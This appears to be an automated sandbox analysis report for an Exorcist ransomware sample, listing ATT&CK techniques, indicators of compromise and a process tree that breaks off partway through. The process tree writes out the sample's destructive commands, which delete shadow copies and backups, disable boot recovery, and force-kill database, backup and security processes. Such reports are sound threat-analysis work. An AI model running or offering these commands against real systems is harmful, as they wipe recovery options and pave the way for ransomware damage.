exorcist | d7d0688022b5848caf5cbabc1bde628cb74f32e014311f5299ed63241fff72b0

Exorcist Ransomware
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1576	bcdedit.exe
1536	bcdedit.exe

Deletes System State backups 3 TTPs 2 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1924	wbadmin.exe
1760	wbadmin.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\CloseRequest.tiff => C:\Users\Admin\Pictures\CloseRequest.tiff.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\InstallRegister.tiff.giDfJo	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\SplitUnlock.tif => C:\Users\Admin\Pictures\SplitUnlock.tif.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CloseRequest.tiff	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\CloseRequest.tiff.giDfJo	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\GroupInvoke.crw => C:\Users\Admin\Pictures\GroupInvoke.crw.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\GroupInvoke.crw.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\InstallRegister.tiff	build-x64-crypt.bin.exe
File renamed	C:\Users\Admin\Pictures\InstallRegister.tiff => C:\Users\Admin\Pictures\InstallRegister.tiff.giDfJo	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SplitUnlock.tif.giDfJo	build-x64-crypt.bin.exe

Deletes itself 1 IoCs

pid	Process
1304	cmd.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	build-x64-crypt.bin.exe
File opened (read-only)	\??\F:	build-x64-crypt.bin.exe
File opened (read-only)	\??\G:	build-x64-crypt.bin.exe
File opened (read-only)	\??\M:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Q:	build-x64-crypt.bin.exe
File opened (read-only)	\??\R:	build-x64-crypt.bin.exe
File opened (read-only)	\??\V:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Z:	build-x64-crypt.bin.exe
File opened (read-only)	\??\H:	build-x64-crypt.bin.exe
File opened (read-only)	\??\L:	build-x64-crypt.bin.exe
File opened (read-only)	\??\T:	build-x64-crypt.bin.exe
File opened (read-only)	\??\A:	build-x64-crypt.bin.exe
File opened (read-only)	\??\K:	build-x64-crypt.bin.exe
File opened (read-only)	\??\N:	build-x64-crypt.bin.exe
File opened (read-only)	\??\O:	build-x64-crypt.bin.exe
File opened (read-only)	\??\S:	build-x64-crypt.bin.exe
File opened (read-only)	\??\W:	build-x64-crypt.bin.exe
File opened (read-only)	\??\X:	build-x64-crypt.bin.exe
File opened (read-only)	\??\Y:	build-x64-crypt.bin.exe
File opened (read-only)	\??\E:	build-x64-crypt.bin.exe
File opened (read-only)	\??\I:	build-x64-crypt.bin.exe
File opened (read-only)	\??\J:	build-x64-crypt.bin.exe
File opened (read-only)	\??\P:	build-x64-crypt.bin.exe
File opened (read-only)	\??\U:	build-x64-crypt.bin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d.bmp"	build-x64-crypt.bin.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
208	timeout.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1980	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1624	taskkill.exe
880	taskkill.exe
1984	taskkill.exe
1500	taskkill.exe
1864	taskkill.exe
1516	taskkill.exe
232	taskkill.exe
1928	taskkill.exe
1924	taskkill.exe
1432	taskkill.exe
600	taskkill.exe
576	taskkill.exe
1088	taskkill.exe
1088	taskkill.exe
1976	taskkill.exe
2012	taskkill.exe
1388	taskkill.exe
1968	taskkill.exe
1480	taskkill.exe
1096	taskkill.exe
1416	taskkill.exe
1080	taskkill.exe
520	taskkill.exe
520	taskkill.exe
1824	taskkill.exe
1048	taskkill.exe
1860	taskkill.exe
1976	taskkill.exe
1556	taskkill.exe
2040	taskkill.exe
2032	taskkill.exe
1876	taskkill.exe
1480	taskkill.exe
564	taskkill.exe
1388	taskkill.exe
1560	taskkill.exe
1076	taskkill.exe
208	taskkill.exe
1952	taskkill.exe
1756	taskkill.exe
1704	taskkill.exe
480	taskkill.exe
1804	taskkill.exe
1468	taskkill.exe
1532	taskkill.exe
1964	taskkill.exe
1896	taskkill.exe
2028	taskkill.exe
1096	taskkill.exe
1080	taskkill.exe
1848	taskkill.exe
216	taskkill.exe
1620	taskkill.exe
1760	taskkill.exe
1568	taskkill.exe
340	taskkill.exe
1904	taskkill.exe
1888	taskkill.exe
1936	taskkill.exe
1496	taskkill.exe
1520	taskkill.exe
1464	taskkill.exe
1884	taskkill.exe
208	taskkill.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:iykxevszimranzpu	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:xbcqjlijd	build-x64-crypt.bin.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:ivrhwmenumbuocvak	build-x64-crypt.bin.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:tpupnbvzicwro	build-x64-crypt.bin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe
284	build-x64-crypt.bin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1616	WMIC.exe
Token: SeSecurityPrivilege	1616	WMIC.exe
Token: SeTakeOwnershipPrivilege	1616	WMIC.exe
Token: SeLoadDriverPrivilege	1616	WMIC.exe
Token: SeSystemProfilePrivilege	1616	WMIC.exe
Token: SeSystemtimePrivilege	1616	WMIC.exe
Token: SeProfSingleProcessPrivilege	1616	WMIC.exe
Token: SeIncBasePriorityPrivilege	1616	WMIC.exe
Token: SeCreatePagefilePrivilege	1616	WMIC.exe
Token: SeBackupPrivilege	1616	WMIC.exe
Token: SeRestorePrivilege	1616	WMIC.exe
Token: SeShutdownPrivilege	1616	WMIC.exe
Token: SeDebugPrivilege	1616	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1616	WMIC.exe
Token: SeRemoteShutdownPrivilege	1616	WMIC.exe
Token: SeUndockPrivilege	1616	WMIC.exe
Token: SeManageVolumePrivilege	1616	WMIC.exe
Token: 33	1616	WMIC.exe
Token: 34	1616	WMIC.exe
Token: 35	1616	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1616	WMIC.exe
Token: SeSecurityPrivilege	1616	WMIC.exe
Token: SeTakeOwnershipPrivilege	1616	WMIC.exe
Token: SeLoadDriverPrivilege	1616	WMIC.exe
Token: SeSystemProfilePrivilege	1616	WMIC.exe
Token: SeSystemtimePrivilege	1616	WMIC.exe
Token: SeProfSingleProcessPrivilege	1616	WMIC.exe
Token: SeIncBasePriorityPrivilege	1616	WMIC.exe
Token: SeCreatePagefilePrivilege	1616	WMIC.exe
Token: SeBackupPrivilege	1616	WMIC.exe
Token: SeRestorePrivilege	1616	WMIC.exe
Token: SeShutdownPrivilege	1616	WMIC.exe
Token: SeDebugPrivilege	1616	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1616	WMIC.exe
Token: SeRemoteShutdownPrivilege	1616	WMIC.exe
Token: SeUndockPrivilege	1616	WMIC.exe
Token: SeManageVolumePrivilege	1616	WMIC.exe
Token: 33	1616	WMIC.exe
Token: 34	1616	WMIC.exe
Token: 35	1616	WMIC.exe
Token: SeBackupPrivilege	1784	vssvc.exe
Token: SeRestorePrivilege	1784	vssvc.exe
Token: SeAuditPrivilege	1784	vssvc.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	1304	taskkill.exe
Token: SeDebugPrivilege	216	taskkill.exe
Token: SeDebugPrivilege	600	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	2012	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	1388	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	1860	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	1088	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeDebugPrivilege	480	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 284 wrote to memory of 748	284	build-x64-crypt.bin.exe	25
PID 284 wrote to memory of 748	284	build-x64-crypt.bin.exe	25
PID 284 wrote to memory of 748	284	build-x64-crypt.bin.exe	25
PID 748 wrote to memory of 1616	748	cmd.exe	27
PID 748 wrote to memory of 1616	748	cmd.exe	27
PID 748 wrote to memory of 1616	748	cmd.exe	27
PID 284 wrote to memory of 1900	284	build-x64-crypt.bin.exe	31
PID 284 wrote to memory of 1900	284	build-x64-crypt.bin.exe	31
PID 284 wrote to memory of 1900	284	build-x64-crypt.bin.exe	31
PID 1900 wrote to memory of 1924	1900	cmd.exe	33
PID 1900 wrote to memory of 1924	1900	cmd.exe	33
PID 1900 wrote to memory of 1924	1900	cmd.exe	33
PID 284 wrote to memory of 1768	284	build-x64-crypt.bin.exe	34
PID 284 wrote to memory of 1768	284	build-x64-crypt.bin.exe	34
PID 284 wrote to memory of 1768	284	build-x64-crypt.bin.exe	34
PID 1768 wrote to memory of 1760	1768	cmd.exe	36
PID 1768 wrote to memory of 1760	1768	cmd.exe	36
PID 1768 wrote to memory of 1760	1768	cmd.exe	36
PID 284 wrote to memory of 1600	284	build-x64-crypt.bin.exe	37
PID 284 wrote to memory of 1600	284	build-x64-crypt.bin.exe	37
PID 284 wrote to memory of 1600	284	build-x64-crypt.bin.exe	37
PID 1600 wrote to memory of 1576	1600	cmd.exe	39
PID 1600 wrote to memory of 1576	1600	cmd.exe	39
PID 1600 wrote to memory of 1576	1600	cmd.exe	39
PID 284 wrote to memory of 1604	284	build-x64-crypt.bin.exe	40
PID 284 wrote to memory of 1604	284	build-x64-crypt.bin.exe	40
PID 284 wrote to memory of 1604	284	build-x64-crypt.bin.exe	40
PID 1604 wrote to memory of 1536	1604	cmd.exe	42
PID 1604 wrote to memory of 1536	1604	cmd.exe	42
PID 1604 wrote to memory of 1536	1604	cmd.exe	42
PID 284 wrote to memory of 1976	284	build-x64-crypt.bin.exe	43
PID 284 wrote to memory of 1976	284	build-x64-crypt.bin.exe	43
PID 284 wrote to memory of 1976	284	build-x64-crypt.bin.exe	43
PID 1976 wrote to memory of 1980	1976	cmd.exe	45
PID 1976 wrote to memory of 1980	1976	cmd.exe	45
PID 1976 wrote to memory of 1980	1976	cmd.exe	45
PID 284 wrote to memory of 2020	284	build-x64-crypt.bin.exe	46
PID 284 wrote to memory of 2020	284	build-x64-crypt.bin.exe	46
PID 284 wrote to memory of 2020	284	build-x64-crypt.bin.exe	46
PID 2020 wrote to memory of 1028	2020	cmd.exe	48
PID 2020 wrote to memory of 1028	2020	cmd.exe	48
PID 2020 wrote to memory of 1028	2020	cmd.exe	48
PID 284 wrote to memory of 2032	284	build-x64-crypt.bin.exe	49
PID 284 wrote to memory of 2032	284	build-x64-crypt.bin.exe	49
PID 284 wrote to memory of 2032	284	build-x64-crypt.bin.exe	49
PID 2032 wrote to memory of 1496	2032	cmd.exe	51
PID 2032 wrote to memory of 1496	2032	cmd.exe	51
PID 2032 wrote to memory of 1496	2032	cmd.exe	51
PID 284 wrote to memory of 1400	284	build-x64-crypt.bin.exe	52
PID 284 wrote to memory of 1400	284	build-x64-crypt.bin.exe	52
PID 284 wrote to memory of 1400	284	build-x64-crypt.bin.exe	52
PID 1400 wrote to memory of 1584	1400	cmd.exe	54
PID 1400 wrote to memory of 1584	1400	cmd.exe	54
PID 1400 wrote to memory of 1584	1400	cmd.exe	54
PID 284 wrote to memory of 1100	284	build-x64-crypt.bin.exe	55
PID 284 wrote to memory of 1100	284	build-x64-crypt.bin.exe	55
PID 284 wrote to memory of 1100	284	build-x64-crypt.bin.exe	55
PID 1100 wrote to memory of 520	1100	cmd.exe	57
PID 1100 wrote to memory of 520	1100	cmd.exe	57
PID 1100 wrote to memory of 520	1100	cmd.exe	57
PID 284 wrote to memory of 1844	284	build-x64-crypt.bin.exe	58
PID 284 wrote to memory of 1844	284	build-x64-crypt.bin.exe	58
PID 284 wrote to memory of 1844	284	build-x64-crypt.bin.exe	58
PID 1844 wrote to memory of 1304	1844	cmd.exe	60

C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe
"C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:284
- C:\Windows\system32\cmd.exe
  cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic.exe SHADOWCOPY DELETE /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1616
- C:\Windows\system32\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\system32\wbadmin.exe
    wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    - Deletes System State backups
    - Drops file in Windows directory
    PID:1924
- C:\Windows\system32\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\wbadmin.exe
    wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
    3⤵
    - Deletes System State backups
    - Drops file in Windows directory
    PID:1760
- C:\Windows\system32\cmd.exe
  cmd /C bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1600
- - C:\Windows\system32\bcdedit.exe
    bcdedit.exe /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1576
- C:\Windows\system32\cmd.exe
  cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\system32\bcdedit.exe
    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1536
- C:\Windows\system32\cmd.exe
  cmd /C vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1980
- C:\Windows\system32\cmd.exe
  cmd /C C:\Windows\system32\vssvc.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\system32\VSSVC.exe
    C:\Windows\system32\vssvc.exe
    3⤵
    PID:1028
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM wxServer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wxServer*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBFCService*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1400
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBFCService*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBVSS*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1100
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBVSS*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:520
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sql*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sql*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1304
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM msaccess*
  2⤵
  PID:1144
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msaccess*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:216
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM mssql*
  2⤵
  PID:1072
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mssql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:600
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM mysql*
  2⤵
  PID:1928
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mysql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM wxServerView*
  2⤵
  PID:1752
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wxServerView*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1612
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqlmangr*
  2⤵
  PID:1556
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlmangr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM RAgui*
  2⤵
  PID:2040
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM RAgui*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM supervise*
  2⤵
  PID:2036
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM supervise*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Culture*
  2⤵
  PID:1432
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Culture*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1388
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Defwatch*
  2⤵
  PID:1448
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Defwatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:576
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM winword*
  2⤵
  PID:764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM winword*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1860
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBW32*
  2⤵
  PID:1292
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBW32*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1884
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgr*
  2⤵
  PID:220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBDBMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM qbupdate*
  2⤵
  PID:748
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM qbupdate*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1920
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM axlbridge*
  2⤵
  PID:1912
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM axlbridge*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1756
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM httpd*
  2⤵
  PID:1564
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM httpd*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1704
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM fdlauncher*
  2⤵
  PID:1604
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fdlauncher*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MsDtSrvr*
  2⤵
  PID:1592
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MsDtSrvr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:480
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM java*
  2⤵
  PID:832
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM java*
    3⤵
    - Kills process with taskkill
    PID:2028
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM 360se*
  2⤵
  PID:308
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM 360se*
    3⤵
    - Kills process with taskkill
    PID:1500
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM 360doctor*
  2⤵
  PID:268
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM 360doctor*
    3⤵
    - Kills process with taskkill
    PID:1804
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM wdswfsafe*
  2⤵
  PID:880
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wdswfsafe*
    3⤵
    - Kills process with taskkill
    PID:1864
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM fdhost*
  2⤵
  PID:208
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fdhost*
    3⤵
    - Kills process with taskkill
    PID:1888
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM GDscan*
  2⤵
  PID:1076
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM GDscan*
    3⤵
    - Kills process with taskkill
    PID:1516
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM ZhuDongFangYu*
  2⤵
  PID:1896
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ZhuDongFangYu*
    3⤵
    - Kills process with taskkill
    PID:1936
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgrN*
  2⤵
  PID:1764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBDBMgrN*
    3⤵
    - Kills process with taskkill
    PID:1760
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM mysqld*
  2⤵
  PID:1540
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mysqld*
    3⤵
    - Kills process with taskkill
    PID:1624
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM AutodeskDesktopApp*
  2⤵
  PID:1988
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AutodeskDesktopApp*
    3⤵
    PID:1972
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM acwebbrowser*
  2⤵
  PID:2020
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM acwebbrowser*
    3⤵
    PID:1028
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Creative Cloud*
  2⤵
  PID:1452
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Creative Cloud*
    3⤵
    - Kills process with taskkill
    PID:1496
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Adobe Desktop Service*
  2⤵
  PID:1852
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Adobe Desktop Service*
    3⤵
    - Kills process with taskkill
    PID:1388
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM CoreSync*
  2⤵
  PID:1584
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM CoreSync*
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Adobe CEF Helper*
  2⤵
  PID:520
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Adobe CEF Helper*
    3⤵
    - Kills process with taskkill
    PID:232
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM node*
  2⤵
  PID:1860
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM node*
    3⤵
    - Kills process with taskkill
    PID:1096
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM AdobeIPCBroker*
  2⤵
  PID:1884
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AdobeIPCBroker*
    3⤵
    PID:1824
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sync-taskbar*
  2⤵
  PID:220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sync-taskbar*
    3⤵
    PID:1568
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sync-worker*
  2⤵
  PID:1920
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sync-worker*
    3⤵
    - Kills process with taskkill
    PID:1560
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM InputPersonalization*
